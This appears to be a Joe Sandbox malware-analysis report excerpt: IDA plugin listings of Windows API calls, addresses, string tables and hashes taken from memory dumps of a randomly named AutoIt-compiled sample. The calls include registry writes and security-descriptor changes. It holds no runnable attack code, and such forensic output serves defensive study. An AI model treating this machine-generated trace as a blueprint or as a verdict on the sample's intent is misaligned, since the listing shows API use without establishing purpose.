                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                        • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                        • API String ID: 2910397461-517079104
                                                        • Opcode ID: da76caf5ee2c9cac1836dcd2884e4adabb05adb5a1fc766797fda0261d378f3c
                                                        • Instruction ID: 28e0d2cd8ab9de0a78fc16ee08eb80f2a099983394612d1d088f0014fbc8479c
                                                        • Opcode Fuzzy Hash: da76caf5ee2c9cac1836dcd2884e4adabb05adb5a1fc766797fda0261d378f3c
                                                        • Instruction Fuzzy Hash: 1AB15EB1A00215BFEB14DF68DC86FAE7BA9EB05711F008118F915E7291D778ED40CBA4
                                                        APIs
                                                        • SetErrorMode.KERNEL32(00000001), ref: 00714AED
                                                        • GetDriveTypeW.KERNEL32(?,0073CB68,?,\\.\,0073CC08), ref: 00714BCA
                                                        • SetErrorMode.KERNEL32(00000000,0073CB68,?,\\.\,0073CC08), ref: 00714D36
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: ErrorMode$DriveType
                                                        • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                        • API String ID: 2907320926-4222207086
                                                        • Opcode ID: 4087cabfc0989cecce256fc95e54b0a9dceafaa3f369776943b70f5a86393360
                                                        • Instruction ID: 8cf435041efa109be069e1ccf4fe5cf1c9d552c8c2fbcb8ead83f7d99604e223
                                                        • Opcode Fuzzy Hash: 4087cabfc0989cecce256fc95e54b0a9dceafaa3f369776943b70f5a86393360
                                                        • Instruction Fuzzy Hash: 8761AFB0705105DBCF14EF2CCA919E8B7B1AB45740B648019F807AB6D1DB2DED81DBA1
                                                        APIs
                                                        • GetSysColor.USER32(00000012), ref: 00737421
                                                        • SetTextColor.GDI32(?,?), ref: 00737425
                                                        • GetSysColorBrush.USER32(0000000F), ref: 0073743B
                                                        • GetSysColor.USER32(0000000F), ref: 00737446
                                                        • CreateSolidBrush.GDI32(?), ref: 0073744B
                                                        • GetSysColor.USER32(00000011), ref: 00737463
                                                        • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00737471
                                                        • SelectObject.GDI32(?,00000000), ref: 00737482
                                                        • SetBkColor.GDI32(?,00000000), ref: 0073748B
                                                        • SelectObject.GDI32(?,?), ref: 00737498
                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 007374B7
                                                        • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 007374CE
                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 007374DB
                                                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0073752A
                                                        • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00737554
                                                        • InflateRect.USER32(?,000000FD,000000FD), ref: 00737572
                                                        • DrawFocusRect.USER32(?,?), ref: 0073757D
                                                        • GetSysColor.USER32(00000011), ref: 0073758E
                                                        • SetTextColor.GDI32(?,00000000), ref: 00737596
                                                        • DrawTextW.USER32(?,007370F5,000000FF,?,00000000), ref: 007375A8
                                                        • SelectObject.GDI32(?,?), ref: 007375BF
                                                        • DeleteObject.GDI32(?), ref: 007375CA
                                                        • SelectObject.GDI32(?,?), ref: 007375D0
                                                        • DeleteObject.GDI32(?), ref: 007375D5
                                                        • SetTextColor.GDI32(?,?), ref: 007375DB
                                                        • SetBkColor.GDI32(?,?), ref: 007375E5
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                        • String ID:
                                                        • API String ID: 1996641542-0
                                                        • Opcode ID: 6825e525d909e4c1fb5cbda71ee882c3024d1ffe6a46702e1bde162e137936c0
                                                        • Instruction ID: e0a3a3e54a0c2ab29dc5b81ade326b15148263bb21b598bd37053bc0d38ebf17
                                                        • Opcode Fuzzy Hash: 6825e525d909e4c1fb5cbda71ee882c3024d1ffe6a46702e1bde162e137936c0
                                                        • Instruction Fuzzy Hash: 586172B2900218AFEF159FA4DC49EEE7FB9EB08321F108115F911BB2A1D7799940DF94
                                                        APIs
                                                        • GetCursorPos.USER32(?), ref: 00731128
                                                        • GetDesktopWindow.USER32 ref: 0073113D
                                                        • GetWindowRect.USER32(00000000), ref: 00731144
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00731199
                                                        • DestroyWindow.USER32(?), ref: 007311B9
                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 007311ED
                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0073120B
                                                        • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0073121D
                                                        • SendMessageW.USER32(00000000,00000421,?,?), ref: 00731232
                                                        • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00731245
                                                        • IsWindowVisible.USER32(00000000), ref: 007312A1
                                                        • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 007312BC
                                                        • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 007312D0
                                                        • GetWindowRect.USER32(00000000,?), ref: 007312E8
                                                        • MonitorFromPoint.USER32(?,?,00000002), ref: 0073130E
                                                        • GetMonitorInfoW.USER32(00000000,?), ref: 00731328
                                                        • CopyRect.USER32(?,?), ref: 0073133F
                                                        • SendMessageW.USER32(00000000,00000412,00000000), ref: 007313AA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                        • String ID: ($0$tooltips_class32
                                                        • API String ID: 698492251-4156429822
                                                        • Opcode ID: cdaf07d7d2133eac99746c1d720d9e668e1b7087c8a7d52780a1c842e3d03f0b
                                                        • Instruction ID: db5fe0ec62464260e6b64d7936c1892697c12666e8a794524e72ea6a28041721
                                                        • Opcode Fuzzy Hash: cdaf07d7d2133eac99746c1d720d9e668e1b7087c8a7d52780a1c842e3d03f0b
                                                        • Instruction Fuzzy Hash: 5CB17A71604341AFE704DF64C885B6ABBE5FF85350F40891CF999AB262C735E844CFA6
                                                        APIs
                                                        • CharUpperBuffW.USER32(?,?), ref: 007302E5
                                                        • _wcslen.LIBCMT ref: 0073031F
                                                        • _wcslen.LIBCMT ref: 00730389
                                                        • _wcslen.LIBCMT ref: 007303F1
                                                        • _wcslen.LIBCMT ref: 00730475
                                                        • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 007304C5
                                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00730504
                                                          • Part of subcall function 006BF9F2: _wcslen.LIBCMT ref: 006BF9FD
                                                          • Part of subcall function 0070223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00702258
                                                          • Part of subcall function 0070223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0070228A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: _wcslen$MessageSend$BuffCharUpper
                                                        • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                        • API String ID: 1103490817-719923060
                                                        • Opcode ID: d6c5eeec2947e776baa6486275d4f09290e4cbc21dd0afb4fd8f69ed43c24065
                                                        • Instruction ID: 65b978db7ae4529284bac04a981cc52ab33dd8fbb27af9b44e61dbb7d8a426fc
                                                        • Opcode Fuzzy Hash: d6c5eeec2947e776baa6486275d4f09290e4cbc21dd0afb4fd8f69ed43c24065
                                                        • Instruction Fuzzy Hash: 36E1CF31208201CFD754EF24C86192AB3E6BF89758F14496CF8969B3A7DB38ED45CB91
                                                        APIs
                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 006B8968
                                                        • GetSystemMetrics.USER32(00000007), ref: 006B8970
                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 006B899B
                                                        • GetSystemMetrics.USER32(00000008), ref: 006B89A3
                                                        • GetSystemMetrics.USER32(00000004), ref: 006B89C8
                                                        • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 006B89E5
                                                        • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 006B89F5
                                                        • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 006B8A28
                                                        • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 006B8A3C
                                                        • GetClientRect.USER32(00000000,000000FF), ref: 006B8A5A
                                                        • GetStockObject.GDI32(00000011), ref: 006B8A76
                                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 006B8A81
                                                          • Part of subcall function 006B912D: GetCursorPos.USER32(?), ref: 006B9141
                                                          • Part of subcall function 006B912D: ScreenToClient.USER32(00000000,?), ref: 006B915E
                                                          • Part of subcall function 006B912D: GetAsyncKeyState.USER32(00000001), ref: 006B9183
                                                          • Part of subcall function 006B912D: GetAsyncKeyState.USER32(00000002), ref: 006B919D
                                                        • SetTimer.USER32(00000000,00000000,00000028,006B90FC), ref: 006B8AA8
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                        • String ID: AutoIt v3 GUI
                                                        • API String ID: 1458621304-248962490
                                                        • Opcode ID: 14dc54f7cf47bfa177b229708c8a78a97ef4f65edcdd2d0aae94e32e928214f3
                                                        • Instruction ID: 3bfc0631aef495041408a5687020f382822893cf2e167002b8ac7ff0155f728d
                                                        • Opcode Fuzzy Hash: 14dc54f7cf47bfa177b229708c8a78a97ef4f65edcdd2d0aae94e32e928214f3
                                                        • Instruction Fuzzy Hash: E6B15C75A00209EFDF14DF68CC45BEA3BB6FB48355F108129FA15AB290DB74A881CF55
                                                        APIs
                                                          • Part of subcall function 007010F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00701114
                                                          • Part of subcall function 007010F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00700B9B,?,?,?), ref: 00701120
                                                          • Part of subcall function 007010F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00700B9B,?,?,?), ref: 0070112F
                                                          • Part of subcall function 007010F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00700B9B,?,?,?), ref: 00701136
                                                          • Part of subcall function 007010F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0070114D
                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00700DF5
                                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00700E29
                                                        • GetLengthSid.ADVAPI32(?), ref: 00700E40
                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 00700E7A
                                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00700E96
                                                        • GetLengthSid.ADVAPI32(?), ref: 00700EAD
                                                        • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00700EB5
                                                        • HeapAlloc.KERNEL32(00000000), ref: 00700EBC
                                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00700EDD
                                                        • CopySid.ADVAPI32(00000000), ref: 00700EE4
                                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00700F13
                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00700F35
                                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00700F47
                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00700F6E
                                                        • HeapFree.KERNEL32(00000000), ref: 00700F75
                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00700F7E
                                                        • HeapFree.KERNEL32(00000000), ref: 00700F85
                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00700F8E
                                                        • HeapFree.KERNEL32(00000000), ref: 00700F95
                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00700FA1
                                                        • HeapFree.KERNEL32(00000000), ref: 00700FA8
                                                          • Part of subcall function 00701193: GetProcessHeap.KERNEL32(00000008,00700BB1,?,00000000,?,00700BB1,?), ref: 007011A1
                                                          • Part of subcall function 00701193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00700BB1,?), ref: 007011A8
                                                          • Part of subcall function 00701193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00700BB1,?), ref: 007011B7
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                        • String ID:
                                                        • API String ID: 4175595110-0
                                                        • Opcode ID: d783a7eb0859b0ccc15d8e383a06002010885fafa1cbaf80fc8dd4b1cd74b495
                                                        • Instruction ID: a22aa24014bdb48f1c1d8d43cb68c6a4d5f30185135c0d1f548a2bc39a9882bc
                                                        • Opcode Fuzzy Hash: d783a7eb0859b0ccc15d8e383a06002010885fafa1cbaf80fc8dd4b1cd74b495
                                                        • Instruction Fuzzy Hash: 3271617190020AEBDF119FA4DC45FAEBBB8BF05311F048215F959B6191D739AA05DBA0
                                                        APIs
                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0072C4BD
                                                        • RegCreateKeyExW.ADVAPI32(?,?,00000000,0073CC08,00000000,?,00000000,?,?), ref: 0072C544
                                                        • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0072C5A4
                                                        • _wcslen.LIBCMT ref: 0072C5F4
                                                        • _wcslen.LIBCMT ref: 0072C66F
                                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 0072C6B2
                                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 0072C7C1
                                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 0072C84D
                                                        • RegCloseKey.ADVAPI32(?), ref: 0072C881
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 0072C88E
                                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 0072C960
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                        • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                        • API String ID: 9721498-966354055
                                                        • Opcode ID: fce7b331fd93d93561243a8747dfb39f1a26fcc7356f76356e6580d20eb070d9
                                                        • Instruction ID: 258f771ad8d706b2ce84f1b58b3c0fdf581cf18eca3a59df621730e3052cdf9b
                                                        • Opcode Fuzzy Hash: fce7b331fd93d93561243a8747dfb39f1a26fcc7356f76356e6580d20eb070d9
                                                        • Instruction Fuzzy Hash: DA1289356042109FDB15EF14D881A2AB7E6EF89314F14889CF88A9B3A2DB35FD41CF95
                                                        APIs
                                                        • CharUpperBuffW.USER32(?,?), ref: 007309C6
                                                        • _wcslen.LIBCMT ref: 00730A01
                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00730A54
                                                        • _wcslen.LIBCMT ref: 00730A8A
                                                        • _wcslen.LIBCMT ref: 00730B06
                                                        • _wcslen.LIBCMT ref: 00730B81
                                                          • Part of subcall function 006BF9F2: _wcslen.LIBCMT ref: 006BF9FD
                                                          • Part of subcall function 00702BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00702BFA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: _wcslen$MessageSend$BuffCharUpper
                                                        • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                        • API String ID: 1103490817-4258414348
                                                        • Opcode ID: 5bd4b8e52e3998bbd730ca1d7fdeb0d768c9140e4a4ed11150700ad2592087b0
                                                        • Instruction ID: d41dd7b2a39cf0568ccdcd69e31dfc2e2415bc1e9896c3fed3645afc0c522572
                                                        • Opcode Fuzzy Hash: 5bd4b8e52e3998bbd730ca1d7fdeb0d768c9140e4a4ed11150700ad2592087b0
                                                        • Instruction Fuzzy Hash: 45E1BD712083018FC754EF24C86092AB7E2BF98358F14895CF8969B3A2DB39ED45CB91
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: _wcslen$BuffCharUpper
                                                        • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                        • API String ID: 1256254125-909552448
                                                        • Opcode ID: a64f5e8fbd502d2bbbbb9f82c42ffec90dc0242a630f34351583fe5328e43a9b
                                                        • Instruction ID: 4d9bd2c757bedadbcdc4e9a1f3649ed3a55f0a7438e07a06221601d3035818a9
                                                        • Opcode Fuzzy Hash: a64f5e8fbd502d2bbbbb9f82c42ffec90dc0242a630f34351583fe5328e43a9b
                                                        • Instruction Fuzzy Hash: 0A71097260017A8BCB12DE7CED515BF33A19F71794B154528FC5697284E63DCD84C7A0
                                                        APIs
                                                        • _wcslen.LIBCMT ref: 0073835A
                                                        • _wcslen.LIBCMT ref: 0073836E
                                                        • _wcslen.LIBCMT ref: 00738391
                                                        • _wcslen.LIBCMT ref: 007383B4
                                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 007383F2
                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00735BF2), ref: 0073844E
                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00738487
                                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 007384CA
                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00738501
                                                        • FreeLibrary.KERNEL32(?), ref: 0073850D
                                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0073851D
                                                        • DestroyIcon.USER32(?,?,?,?,?,00735BF2), ref: 0073852C
                                                        • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00738549
                                                        • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00738555
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                        • String ID: .dll$.exe$.icl
                                                        • API String ID: 799131459-1154884017
                                                        • Opcode ID: b82958c1f5fb7b3bb34641a6220f3a3bd56b2124129a169983337290c9ba94fc
                                                        • Instruction ID: 93af6fac0452ac9947967806cafcbc584c1abe5db4f6517ccd04526f69b2f437
                                                        • Opcode Fuzzy Hash: b82958c1f5fb7b3bb34641a6220f3a3bd56b2124129a169983337290c9ba94fc
                                                        • Instruction Fuzzy Hash: D761D072500319BAFB55DF64CC45BBE77A8FB08721F108609F815E61D2DF78A990CBA0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                        • API String ID: 0-1645009161
                                                        • Opcode ID: f9f13b4bd1aa0112f2f7c26bde49300c3a6af3452b4b4cfb7d7e47cabee85b60
                                                        • Instruction ID: 87259439f749ad4c0a8581032308e032f561c606caaf20caaddf78310c2a2305
                                                        • Opcode Fuzzy Hash: f9f13b4bd1aa0112f2f7c26bde49300c3a6af3452b4b4cfb7d7e47cabee85b60
                                                        • Instruction Fuzzy Hash: 8E81D8B1604205BBDB60BF60DC42FEE776AAF16340F044028F9056B292EB74DE51DBA5
                                                        APIs
                                                        • LoadIconW.USER32(00000063), ref: 00705A2E
